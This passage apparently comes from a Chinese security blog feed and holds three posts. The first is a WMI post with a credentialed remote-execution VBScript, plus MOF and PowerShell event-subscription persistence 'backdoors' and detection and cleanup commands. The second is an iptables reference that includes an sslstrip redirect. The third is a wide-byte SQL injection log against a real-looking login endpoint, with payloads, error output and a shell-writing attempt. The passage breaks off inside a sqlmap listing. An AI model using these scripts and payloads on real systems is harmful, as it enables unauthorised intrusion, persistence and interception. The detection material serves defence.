<li>SNMP - Simple Network Management Protocol. SNMP is an Internet standard defined by the IETF and is a part of TCP/IP suite of protocols. SNMP is the protocol by which managed information is travel between stations and agents. Management information refers to a collection of managed objects that reside in a virtual information store called a Management Information Base (MIB).</li>
<li>WBEM - Web-Based Enterprise Management – WBEM stands for several DMTF industry standards including the Common Information Model. WBEM provides a standardized way to access information from various hardware and software management systems in an enterprise environment. </li>
</ul>
<p>协议</p>
<p>DCOM TCP Port 135<br>WinRM TCP Ports 5985 (HTTP) and 5986 (HTTPS).<br>服务 Winmgmt </p>
<a id="more"></a>
<h3 id="测试工具"><a href="#测试工具" class="headerlink" title="测试工具"></a>测试工具</h3><ul>
<li>wmic.exe</li>
<li>wbemtest.exe</li>
<li>winrm.exe</li>
<li>CIM Studio</li>
<li>Powershell</li>
</ul>
<p>WMIC</p>
<p>列出进程<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic process list brief</div></pre></td></tr></table></figure></p>
<p>创建进程<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">wmic process call create "notepad.exe"</div><div class="line">wmic /node:"hostname" /user:"domain\administrator" /password:"123456" process get name,processid</div></pre></td></tr></table></figure></p>
<p>结束程序<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic process where name="qq.exe" call terminate</div></pre></td></tr></table></figure></p>
<p>启动服务<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic SERVICE where name="tlntsvr" call startservice</div></pre></td></tr></table></figure></p>
<p>计划任务<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">wmic job</div></pre></td></tr></table></figure></p>
<p>Powershell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Get-WmiObject</span> -Namespace root\SecurityCenter2 -Class AntiVirusProduct</div></pre></td></tr></table></figure></p>
<p>//-Cre 为创建好的登陆凭据<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Invoke-WmiMethod</span> -Class Win32_Process -Name Create -ArgumentList <span class="string">'notepad.exe'</span> -ComputerName <span class="number">192.168</span>.<span class="number">6.2</span> -Credential domain\administrator</div></pre></td></tr></table></figure></p>
<p>WQL<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> Win32_ComputerSystem <span class="keyword">WHERE</span> NumberOfLogicalProcessors < <span class="number">2</span> </div><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> __InstanceCreationEvent <span class="keyword">WITHIN</span> <span class="number">15</span> <span class="keyword">WHERE</span> TargetInstance ISA <span class="string">'Win32_LogonSession'</span> <span class="keyword">AND</span> TargetInstance.LogonType = <span class="number">2</span> </div><div class="line"><span class="keyword">SELECT</span> * <span class="keyword">FROM</span> Win32_VolumeChangeEvent <span class="keyword">WHERE</span> EventType = <span class="number">2</span></div></pre></td></tr></table></figure></p>
<h3 id="WSH"><a href="#WSH" class="headerlink" title="WSH"></a>WSH</h3><p>REMOTE COMMAND EXEC</p>
<blockquote>
<p>有时候低权限用户无法初始化wmic命令行程序,但vbs却能访问wmi接口。</p>
</blockquote>
<figure class="highlight vbs"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line"><span class="comment">'VBS</span></div><div class="line"><span class="comment">' remote command exec</span></div><div class="line"><span class="comment">' cscript wmiexec.vbs 192.168.6.2 domain\administrator 123456 "cmd.exe /c net user > c:\11.txt"</span></div><div class="line"><span class="keyword">On</span> <span class="keyword">Error</span> <span class="keyword">GoTo</span> <span class="number">0</span></div><div class="line"><span class="keyword">Dim</span> strComputer</div><div class="line"><span class="keyword">Dim</span> strUser</div><div class="line"><span class="keyword">Dim</span> strPassword</div><div class="line"><span class="keyword">Dim</span> strCommand</div><div class="line"><span class="keyword">Set</span> objArgs = WScript.Arguments</div><div class="line">strComputer = objArgs(<span class="number">0</span>)</div><div class="line">strUser = objArgs(<span class="number">1</span>)</div><div class="line">strPassword = objArgs(<span class="number">2</span>)</div><div class="line">strCommand = objArgs(<span class="number">3</span>)</div><div class="line"><span class="keyword">Set</span> objWMIService = <span class="built_in">CreateObject</span>(<span class="string">"WbemScripting.SWbemLocator"</span>).ConnectServer(strComputer,<span class="string">"root/cimv2"</span>,strUser,strPassword)</div><div class="line"><span class="comment">' Create process</span></div><div class="line"><span class="keyword">Set</span> process = objWMIService.<span class="keyword">Get</span>(<span class="string">"Win32_Process"</span>)</div><div class="line">intReturn = process.Create(strCommand)</div><div class="line"><span class="keyword">If</span> intReturn <><span class="number">0</span> <span class="keyword">then</span></div><div class="line"> WScript.Echo <span class="string">"Return value: "</span> & intReturn</div><div class="line"> WScript.Echo <span class="string">"Access denied (2)"</span> &vbLf & _</div><div class="line"> <span class="string">"Insufficient privilege (3)"</span> &vbLf & _</div><div class="line"> <span class="string">"Unknown failure (8)"</span> &vbLf & _</div><div class="line"> <span class="string">"Path not found (9)"</span> &vbLf & _</div><div class="line"> <span class="string">"Invalid parameter (21)"</span> &vbLf & _</div><div class="line"> <span class="string">"Other (22-4294967295)"</span></div><div class="line"><span class="keyword">Else</span></div><div class="line"> Wscript.Echo <span class="string">"Process created."</span></div><div class="line"><span class="keyword">End</span> <span class="keyword">If</span></div></pre></td></tr></table></figure>
<h3 id="MOF-后门"><a href="#MOF-后门" class="headerlink" title="MOF 后门"></a>MOF 后门</h3><blockquote>
<p>Managed Object Format (MOF)是WMI数据库中类和类实例的原始保存形式</p>
</blockquote>
<p>动态创建 WMI 类</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$StaticClass</span>=New-ObjectManagement.ManagementClass(<span class="string">'root\cimv2'</span>,<span class="literal">$null</span>,<span class="literal">$null</span>)</div><div class="line"><span class="variable">$StaticClass</span>.Name = <span class="string">'Win32_EvilClass'</span></div><div class="line"><span class="variable">$StaticClass</span>.Put()</div><div class="line"><span class="variable">$StaticClass</span>.Properties.Add(<span class="string">'EvilProperty'</span>,<span class="string">"This is not the malware you're looking for"</span>)</div><div class="line"><span class="variable">$StaticClass</span>.Put()</div></pre></td></tr></table></figure>
<p>创建永久事件订阅</p>
<ol>
<li>Event Filters 事件筛选器 -筛选出感兴趣的事件 </li>
<li><p>Event Consumers 事件消费者 -要在事件被触发时执行的操作 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"> __EventConsumer </div><div class="line">LogFileEventConsumer - 将事件数据写入到指定的日志文件 </div><div class="line">ActiveScriptEventConsumer - 执行嵌入的 VBScript 或 JScript 脚本 </div><div class="line">payloadNTEventLogEventConsumer - 创建一个包含事件数据的事件日志条目 </div><div class="line">SMTPEventConsumer - 发送一封包含事件数据的电子邮件 </div><div class="line">CommandLineEventConsumer - 执行一个命令行程序</div></pre></td></tr></table></figure>
</li>
<li><p>Binding -绑定筛选器到消费者<br> __FilterToConsumerBinding</p>
</li>
</ol>
<p>事件类型 </p>
<p>内部事件<br>内部事件表示的是创建、修改和删除任何 WMI 类,对象或命名空间的事件。常以两个下划线开头。有可能错过事件,所以必须在 WQL 查询语句的 WITHIN 子句中指定事件轮询间隔。<br>__InstanceCreationEvent </p>
<p>外部事件<br>WMI外部事件较少,事件发生时立刻被触发。<br>ROOT\CIMV2:Win32_OperatingSystem </p>
<blockquote>
<p>使用外部的 Win32_ProcessStartTrace 事件作为创建 LogonUI.exe 的触发器,可在用户登录的时候执行特定脚本或程序。</p>
</blockquote>
<p>test.mof</p>
<p><a href="https://www.codeproject.com/articles/27914/wmi-mof-basics" target="_blank" rel="external">https://www.codeproject.com/articles/27914/wmi-mof-basics</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")</div><div class="line"></div><div class="line">instance of CommandLineEventConsumer as $Consumer</div><div class="line">{</div><div class="line"> Name = "WMI_Mofbackdoor_Test_CL";</div><div class="line"> RunInteractively=false;</div><div class="line"> CommandLineTemplate="calc.exe";</div><div class="line">};</div><div class="line"></div><div class="line">instance of __EventFilter as $EventFilter</div><div class="line">{</div><div class="line"> Name = "WMI_Mofbackdoor_Test_EF";</div><div class="line"> EventNamespace = "Root\\Cimv2";</div><div class="line"> Query ="SELECT * FROM __InstanceCreationEvent Within 5 Where TargetInstance Isa \"Win32_Process\" And Targetinstance.Name = \"notepad.exe\" ";</div><div class="line"> QueryLanguage = "WQL";</div><div class="line">};</div><div class="line"></div><div class="line">instance of __FilterToConsumerBinding {</div><div class="line"> Filter = $EventFilter;</div><div class="line"> Consumer = $Consumer;</div><div class="line">};</div></pre></td></tr></table></figure>
<p>编译<br>mofcomp.exe –autorecover test.mof </p>
<p>mofcomp -N //[machinename]/root/subscription test.mof</p>
<p>或者<br>拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹,会自动编译执行</p>
<p>PowerShell</p>
<p>• Get-WmiObject<br>• Get-CimAssociatedInstance<br>• Get-CimClass - Powershell 3.0 CmdLet<br>• Get-CimInstance<br>• Get-CimSession<br>• Set-WmiInstance<br>• Set-CimInstance<br>• Invoke-WmiMethod<br>• Invoke-CimMethod<br>• New-CimInstance<br>• New-CimSession<br>• New-CimSessionOption<br>• Register-CimIndicationEvent<br>• Register-WmiEvent<br>• Remove-CimInstance<br>• Remove-WmiObject<br>• Remove-CimSession </p>
<p>创建开机启动事件</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$filterName</span>=<span class="string">'BotFilter82'</span></div><div class="line"><span class="variable">$consumerName</span>=<span class="string">'BotConsumer23'</span></div><div class="line"><span class="variable">$exePath</span>=<span class="string">'C:\MyProg.exe'</span></div><div class="line"><span class="comment">#创建一个__EventFilter</span></div><div class="line"><span class="variable">$Query</span>=<span class="string">"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"</span></div><div class="line"><span class="variable">$WMIEventFilter</span>=<span class="built_in">Set-WmiInstance</span> -Class __EventFilter -NameSpace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line">Name=<span class="variable">$filterName</span>;</div><div class="line">EventNameSpace=<span class="string">"root\cimv2"</span>;</div><div class="line">QueryLanguage=<span class="string">"WQL"</span>;</div><div class="line">Query=<span class="variable">$Query</span>} -ErrorAction Stop</div><div class="line"><span class="comment">#创建一个CommandLineEventConsumer</span></div><div class="line"><span class="variable">$WMIEventConsumer</span>=<span class="built_in">Set-WmiInstance</span> -Class CommandLineEventConsumer -Namespace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line">Name=<span class="variable">$consumerName</span>;</div><div class="line">ExecutablePath=<span class="variable">$exePath</span>;</div><div class="line">CommandLineTemplate=<span class="variable">$exePath</span>}</div><div class="line"><span class="comment">#用于绑定filter和consumer</span></div><div class="line"><span class="built_in">Set-WmiInstance</span> -Class __FilterToConsumerBinding -Namespace <span class="string">"root\subscription"</span> -Arguments @{</div><div class="line"><span class="keyword">Filter</span>=<span class="variable">$WMIEventFilter</span>;</div><div class="line">Consumer=<span class="variable">$WMIEventConsumer</span></div><div class="line">}</div></pre></td></tr></table></figure>
<h3 id="检测"><a href="#检测" class="headerlink" title="检测"></a>检测</h3><blockquote>
<p>wmi有时候被恶意软件用来修改浏览器主页</p>
</blockquote>
<p>查看过滤器,消费者,绑定</p>
<p>PowerShell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#List Event Filters</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventFilter</div><div class="line"><span class="comment">#List Event Consumers</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventConsumer</div><div class="line"><span class="comment">#List Event Bindings</span></div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __FilterToConsumerBinding</div></pre></td></tr></table></figure></p>
<p>使用 wmic</p>
<p>wmic /namespace:\root\subscription PATH <strong>EventConsumer get/format:list<br>wmic /namespace:\root\subscription PATH </strong>EventFilter get/format:list<br>wmic /namespace:\root\subscription PATH <strong>FilterToConsumerBinding get/ format:list<br>wmic /namespace:\root\subscription PATH </strong>TimerInstruction get/format:list</p>
<p>清除</p>
<p>Powershell<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __EventFilter -Filter <span class="string">"Name='filtP1'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose </div><div class="line"><span class="built_in">Get-WmiObject</span> -Namespace root\Subscription -Class __EventConsumer</div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class CommandLineEventConsumer -Filter <span class="string">"Name='consP1'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose </div><div class="line"><span class="built_in">Get-WMIObject</span> -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter <span class="string">"__Path LIKE '%BotFilter82%'"</span> | <span class="built_in">Remove-WmiObject</span> -Verbose</div></pre></td></tr></table></figure></p>
<p>使用 wmic</p>
<p>wmic /namespace:\root\subscription PATH <strong>EventConsumer delete<br>wmic /namespace:\root\subscription PATH </strong>EventFilter delete<br>wmic /namespace:\root\subscription PATH <strong>FilterToConsumerBinding delete<br>wmic /namespace:\root\subscription PATH </strong>TimerInstruction delete</p>
<h3 id="WMI-Providers"><a href="#WMI-Providers" class="headerlink" title="WMI Providers"></a>WMI Providers</h3><p><a href="https://www.codeproject.com/articles/5206/a-simple-guide-to-wmi-providers" target="_blank" rel="external">https://www.codeproject.com/articles/5206/a-simple-guide-to-wmi-providers</a></p>
<p>安装提供程序<br>Installutil.exe WMIServiceHost.dll</p>
<p>wmic PATH win32_servicehost</p>
<p>错误处理 </p>
<p>注册dll<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">regasm %systemdrive%\program files\reference assemblies\microsoft\framework\v3.5\system.management.instrumentation.dll</div></pre></td></tr></table></figure></p>
<h3 id="架构"><a href="#架构" class="headerlink" title="架构"></a>架构</h3><p>namespaces, classes, and objects</p>
<p>持久性对象存储在位于 %SystemRoot%\System32\wbem\Repository\ 的 CIM 数据库中,它存储着 WMI 类的实例,类的定义和命名空间的定义。</p>
<blockquote>
<p>Note<br>1,CIM 数据库可存储任意数据<br>2,作为C2通道传输数据<br>3,创建提供程序 </p>
</blockquote>
]]></content>
</entry>
<entry>
<title><![CDATA[Iptables]]></title>
<url>/2016/09/19/Iptables/</url>
<content type="html"><![CDATA[<p>Chain</p>
<ol>
<li>PREROUTING (路由前)</li>
<li>INPUT (数据包流入口)</li>
<li>FORWARD (转发)</li>
<li>OUTPUT (数据包出口)</li>
<li>POSTROUTING (路由后)</li>
</ol>
<p><img src="https://i.imgur.com/CAjJ7Y1.gif" alt=""></p>
<a id="more"></a>
<p>查看路由表<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">iptables -L -n -v</div><div class="line">iptables -L -n --line-number</div><div class="line">iptables -t nat -vnL</div></pre></td></tr></table></figure></p>
<p>设置默认策略<br>iptables -P INPUT (DROP|ACCEPT) 默认是关的/默认是开的</p>
<p>清空规则链<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">iptables -t nat -F 清空nat表的所有链</div><div class="line">iptables -t nat -F PREROUTING</div><div class="line">iptables -F</div></pre></td></tr></table></figure></p>
<p>新建一个链<br>iptables -N NEWCHAINNAME</p>
<p>-s:指定作为源地址匹配,这里不能指定主机名称,必须是IP<br>IP | IP/MASK | 0.0.0.0/0.0.0.0<br>而且地址可以取反,加一个“!”表示除了哪个IP之外<br>-d:表示匹配目标地址<br>-p:用于匹配协议的(这里的协议通常有3种,TCP/UDP/ICMP)<br>-i eth0:从这块网卡流入的数据<br>流入一般用在INPUT和PREROUTING上<br>-o eth0:从这块网卡流出的数据<br>流出一般在OUTPUT和POSTROUTING上</p>
<p>–dport 22 指定目的端口<br>–sport 22 指定源端口<br>-p tcp 指定协议<br>-j ACTION DROP/REJECT/ACCEPT/DNAT(目的地址转换)/SNAT(源地址转换)/MASQUERADE/REDIRECT</p>
<p>只允许192.168.6.1访问本机ssh服务<br><code>iptables -t filter -A INPUT -s 192.168.6.1 -p tcp --dport 22 -j ACCEPT</code></p>
<p>除了192.168.6.1地址拒绝所有其他访问22端口<br><code>iptables -A INPUT ! -s 192.168.6.1 -p tcp --dport 22 -j DROP</code></p>
<p>删除第4条(delete)<br><code>iptables -D INPUT 4</code></p>
<p>删除FORWARD<br><code>iptables -D FORWARD 1</code></p>
<p>比如进来的只允许状态为NEW和ESTABLISHED的进来,出去只允许ESTABLISHED的状态出去,这就可以将比较常见的反弹式木马有很好的控制机制。</p>
<p>nat功能<br><code>iptables -t nat -A POSTROUTING -s 192.168.10.0/24 -j MASQUERADE</code></p>
<p>nat之后,将访问192.168.10.18 80端口定向到nat后的172.16.100.2<br><code>iptables -t nat -A PREROUTING -d 192.168.10.18 -p tcp --dport 80 -j DNAT --to-destination 172.16.100.2</code></p>
<p>将访问80端口转发到本地端口<br><code>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <sslstrip listenPort></code></p>
<p>DNAT 端口映射<br><code>iptables -t nat -A PREROUTING -d 公网IP -p TCP --dport 80 -j DNAT --to-destination 10.31.2.1</code><br><code>iptables -t nat -A PREROUTING -i eth1 -p udp --dport 53 -j DNAT --to 192.168.6.1</code></p>
<p>删除nat PREROUTING<br><code>iptables -t nat -D PREROUTING <num></code></p>
<p>在INPUT第三条后面插入(insert)<br><code>iptables -I INPUT 3 -p tcp --dport 21 -j ACCEPT</code></p>
<p>修改<br><code>iptables -R INPUT 3 -j DROP</code></p>
<p>默认规则<br><code>iptables -A INPUT -j ACCEPT</code></p>
<p>保存<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">iptables-save</div><div class="line">/etc/sysconfig/iptables</div></pre></td></tr></table></figure></p>
<p>恢复<br><code>iptables-restore</code></p>
<p>每30s 5个连接(rcheck是接收到第1个数据包时开始计时,10s内仅限3次连接,后续的包丢弃)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">iptables -R INPUT 2 -p icmp -m recent --update --seconds 10 --hitcount 3 --name PINGTEST --rsource -j DROP</div><div class="line"> -A INPUT -p icmp -m recent --set --name PINGTEST --rsource -j ACCEPT</div></pre></td></tr></table></figure></p>
<p>控制单个IP的最大并发连接数 < 10<br><code>iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j REJECT</code></p>
<p>控制单个IP在一定的时间内允许新建立的连接数 15/m<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">-A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT</div><div class="line">-A INPUT -p tcp -m conntrack --ctstate NEW -j DROP</div></pre></td></tr></table></figure></p>
<p>过滤ip<br><code>iptables -I INPUT -s 121.69.131.144 -j DROP</code></p>
<p>CentOS<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">/sbin/iptables -I INPUT -p tcp --dport 8080 -j ACCEPT #开启8080端口</div><div class="line">/etc/rc.d/init.d/iptables save #保存配置</div><div class="line">/etc/rc.d/init.d/iptables restart #重启服务</div><div class="line">/etc/init.d/iptables status</div></pre></td></tr></table></figure></p>
]]></content>
</entry>
<entry>
<title><![CDATA[PHP宽字节报错注入]]></title>
<url>/2015/07/04/PHP%E5%AE%BD%E5%AD%97%E8%8A%82%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/</url>
<content type="html"><![CDATA[<h4 id="注入测试"><a href="#注入测试" class="headerlink" title="注入测试"></a>注入测试</h4><p>注入点,单引号被转义<br>POST <a href="http://211.137.*.*/logincheck.php" target="_blank" rel="external">http://211.137.*.*/logincheck.php</a><br>PASSWORD=1111&UNAME=admin</p>
<h5 id="TESTING01-测试宽字节"><a href="#TESTING01-测试宽字节" class="headerlink" title="TESTING01 测试宽字节"></a>TESTING01 测试宽字节</h5><p><code>PASSWORD=1111&UNAME=1%bf'</code></p>
<p>#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘1縗’’’ at line 1<br>SQL语句: <code>SELECT * from USER where USER_ID='1縗'' or BYNAME='1縗''</code><br>文件: D:/myoa/webroot/logincheck.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">Note</div><div class="line">为了阻止SQL注入,php引入了magic_quotes_gpc,当打开时会对单引号,双引号,反斜线和 NULL字符自动转义。但是当数据库是GBK编码,就会导致宽字节注入。</div><div class="line">转义引号\'</div><div class="line">PASSWORD=123456&UNAME=admin%bf\'</div><div class="line"> ---------------------</div><div class="line">|\ ==> %5C |</div><div class="line">|当 %bf5c会解码成 縗 |</div><div class="line"> ---------------------</div></pre></td></tr></table></figure>
<h5 id="TESTING02-闭合语句"><a href="#TESTING02-闭合语句" class="headerlink" title="TESTING02 闭合语句"></a>TESTING02 闭合语句</h5><p><code>PASSWORD=123456&UNAME=admin%bf%5C'</code></p>
<p>SQL语句: <code>SELECT * from USER where USER_ID='admin縗'' or BYNAME='admin縗''</code></p>
<p>但是系统多加了一个引号’导致语句出错,我们使用#(%23)注释掉后面的语句。</p>
<p><code>PASSWORD=123456&UNAME=admin%bf'%23</code></p>
<p>SQL语句: <code>SELECT * from USER where USER_ID='admin縗'#' or BYNAME='admin縗'#'</code></p>
<h5 id="TESTING03-处理插入语句报错"><a href="#TESTING03-处理插入语句报错" class="headerlink" title="TESTING03 处理插入语句报错"></a>TESTING03 处理插入语句报错</h5><p>select登陆查询语句成功执行,未报错,但是登陆日志插入语句报语法错误。</p>
<p>#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ at line 1<br>SQL语句: <code>insert into SYS_LOG (USER_ID,TIME,IP,TYPE,REMARK) values ('admin縗'#','2015-09-04 13:41:11','27.211.123.74','10','USERNAME=admin縗'#')</code><br>文件: D:/myoa/webroot/logincheck.php</p>
<p>使用注释构造插入语句<br><code>PASSWORD=123456&UNAME=admin%bf',2,3,4)%23</code></p>
<p>#1136: Column count doesn’t match value count at row 1<br>SQL语句: <code>insert into SYS_LOG (USER_ID,TIME,IP,TYPE,REMARK) values ('admin縗',2,3,4)#','2015-09-04 13:50:55','27.211.123.74','10','USERNAME=admin縗',2,3,4)#')</code><br>文件: D:/myoa/webroot/logincheck.php</p>
<p>提示列数不对,插入少了一个字段,添加一个值后无报错。</p>
<p>PAYLOAD<br><code>PASSWORD=123456&UNAME=admin%bf',2,3,4,5)%23</code></p>
<h4 id="尝试写SHELL"><a href="#尝试写SHELL" class="headerlink" title="尝试写SHELL"></a>尝试写SHELL</h4><p>判断列数<br><code>PASSWORD=123456&UNAME=admin%bf' order by 1%23</code></p>
<p>使用列最大值判断是否出错<br><code>PASSWORD=123456&UNAME=admin%bf' order by 100%23</code></p>
<p>#1054: Unknown column ‘100’ in ‘order clause’<br>SQL语句: <code>SELECT * from USER where USER_ID='admin縗' order by 100#' or BYNAME='admin縗' order by 100#'</code><br>文件: D:/myoa/webroot/logincheck.php</p>
<p>不报错字段77,卧槽77啊<br><code>PASSWORD=123456&UNAME=admin%bf' order by 77%23</code><br><code>PASSWORD=123456&UNAME=admin%bf' and 1=2 union all select 123456,admin縗%23</code><br><code>PASSWORD=123456&UNAME=admin%bf' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,...,74,75,76,77 into outfile "D:/myoa/webroot/r1.txt"%23</code><br>返回空白(可能没有写入权限或者目录不可写)</p>
<h4 id="sqlmap添加-自动跑库"><a href="#sqlmap添加-自动跑库" class="headerlink" title="sqlmap添加*自动跑库"></a>sqlmap添加*自动跑库</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div 